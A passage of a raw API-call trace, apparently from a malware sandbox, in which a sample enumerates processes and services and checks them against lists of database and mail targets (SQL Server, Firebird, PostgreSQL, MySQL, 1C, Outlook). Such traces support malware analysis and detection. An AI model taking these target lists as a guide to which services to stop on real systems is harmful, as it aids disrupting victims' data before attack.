hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.423] lstrlenW (lpString="svchost.exe") returned 11 [0265.423] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.423] lstrlenW (lpString="svchost.exe") returned 11 [0265.423] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0265.423] lstrlenW (lpString="userinit.exe") returned 12 [0265.423] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0265.424] lstrlenW (lpString="dwm.exe") returned 7 [0265.424] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0265.424] lstrlenW (lpString="explorer.exe") returned 12 [0265.424] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0265.424] lstrlenW (lpString="spoolsv.exe") returned 11 [0265.424] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0265.425] lstrlenW (lpString="taskhost.exe") returned 12 [0265.425] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.425] lstrlenW (lpString="svchost.exe") returned 11 [0265.425] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0265.425] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0265.425] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0265.425] lstrlenW (lpString="reader_sl.exe") returned 13 [0265.425] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0265.426] CloseHandle (hObject=0x3cc) returned 1 [0265.426] Sleep (dwMilliseconds=0x1f4) [0266.019] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea0b0 [0266.190] EnumServicesStatusExW (in: hSCManager=0x47ea0b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0266.191] GetLastError () returned 0xea [0266.191] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xd68) returned 0x3dec5a0 [0266.191] EnumServicesStatusExW (in: hSCManager=0x47ea0b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xd68, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0266.191] CloseServiceHandle (hSCObject=0x47ea0b0) returned 1 [0266.192] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0266.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0266.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0266.192] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0266.192] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0266.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0266.192] lstrlenW (lpString="AudioSrv") returned 8 [0266.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0266.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0266.192] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0266.192] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0266.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0266.192] lstrlenW (lpString="BFE") returned 3 [0266.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0266.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0266.192] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0266.192] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0266.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0266.192] lstrlenW (lpString="CryptSvc") returned 8 [0266.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0266.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0266.192] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0266.192] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0266.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0266.192] lstrlenW (lpString="CscService") returned 10 [0266.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0266.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0266.192] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0266.192] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0266.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0266.192] lstrlenW (lpString="DcomLaunch") returned 10 [0266.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0266.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0266.193] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0266.193] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0266.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0266.193] lstrlenW (lpString="Dhcp") returned 4 [0266.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0266.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0266.193] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0266.193] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0266.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0266.193] lstrlenW (lpString="Dnscache") returned 8 [0266.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0266.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0266.193] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0266.193] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0266.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0266.193] lstrlenW (lpString="DPS") returned 3 [0266.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0266.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0266.193] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0266.193] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0266.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0266.193] lstrlenW (lpString="eventlog") returned 8 [0266.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0266.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0266.193] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0266.193] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0266.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0266.193] lstrlenW (lpString="EventSystem") returned 11 [0266.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0266.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0266.193] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0266.194] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0266.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0266.194] lstrlenW (lpString="gpsvc") returned 5 [0266.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0266.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0266.194] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0266.194] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0266.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0266.194] lstrlenW (lpString="LanmanWorkstation") returned 17 [0266.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0266.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0266.194] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0266.194] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0266.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0266.194] lstrlenW (lpString="lmhosts") returned 7 [0266.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0266.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0266.194] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0266.194] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0266.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0266.194] lstrlenW (lpString="MMCSS") returned 5 [0266.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0266.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0266.194] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0266.194] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0266.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0266.194] lstrlenW (lpString="MpsSvc") returned 6 [0266.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0266.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0266.194] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0266.194] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0266.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0266.194] lstrlenW (lpString="NlaSvc") returned 6 [0266.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0266.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0266.195] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0266.195] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0266.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0266.195] lstrlenW (lpString="nsi") returned 3 [0266.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0266.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0266.195] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0266.195] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0266.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0266.195] lstrlenW (lpString="PcaSvc") returned 6 [0266.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0266.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0266.195] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0266.195] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0266.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0266.195] lstrlenW (lpString="PlugPlay") returned 8 [0266.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0266.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0266.195] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0266.195] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0266.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0266.195] lstrlenW (lpString="Power") returned 5 [0266.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0266.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0266.195] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0266.195] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0266.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0266.195] lstrlenW (lpString="ProfSvc") returned 7 [0266.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0266.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0266.196] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0266.196] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0266.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0266.196] lstrlenW (lpString="RpcEptMapper") returned 12 [0266.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0266.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0266.196] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0266.196] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0266.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0266.196] lstrlenW (lpString="RpcSs") returned 5 [0266.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0266.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0266.196] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0266.196] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0266.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0266.196] lstrlenW (lpString="SamSs") returned 5 [0266.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0266.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0266.196] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0266.196] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0266.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0266.196] lstrlenW (lpString="Schedule") returned 8 [0266.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0266.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0266.196] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0266.196] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0266.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0266.196] lstrlenW (lpString="SENS") returned 4 [0266.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0266.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0266.196] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0266.196] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0266.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0266.197] lstrlenW (lpString="ShellHWDetection") returned 16 [0266.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0266.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0266.197] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0266.197] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0266.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0266.197] lstrlenW (lpString="Spooler") returned 7 [0266.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0266.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0266.197] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0266.197] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0266.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0266.197] lstrlenW (lpString="SysMain") returned 7 [0266.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0266.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0266.197] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0266.197] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0266.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0266.197] lstrlenW (lpString="Themes") returned 6 [0266.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0266.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0266.197] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0266.197] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0266.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0266.197] lstrlenW (lpString="TrkWks") returned 6 [0266.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0266.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0266.197] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0266.197] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0266.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0266.197] lstrlenW (lpString="UxSms") returned 5 [0266.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0266.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0266.197] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0266.197] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0266.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0266.198] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0266.198] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3c4 [0266.199] Process32FirstW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.200] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0266.200] lstrlenW (lpString="System") returned 6 [0266.200] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0266.200] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0266.200] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0266.200] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0266.200] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0266.200] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0266.200] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0266.200] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0266.200] lstrlenW (lpString="smss.exe") returned 8 [0266.200] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0266.200] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0266.200] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0266.200] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0266.200] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0266.200] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0266.201] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0266.201] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.201] lstrlenW (lpString="csrss.exe") returned 9 [0266.201] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0266.201] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0266.201] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0266.201] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0266.201] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0266.201] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0266.201] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0266.201] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0266.201] lstrlenW (lpString="wininit.exe") returned 11 [0266.201] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0266.201] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0266.201] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0266.201] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0266.201] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0266.201] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0266.202] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0266.202] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.202] lstrlenW (lpString="csrss.exe") returned 9 [0266.202] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0266.202] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0266.202] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0266.202] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0266.202] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0266.202] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0266.202] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0266.202] Process32NextW (in: hSnapshot=0x3c4, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0266.202] lstrlenW (lpString="winlogon.exe") returned 12 [0266.202] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0266.202] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0266.202] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0266.202] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0266.202] lstrcmpiW (lpString1="mysqld-nt.exe", 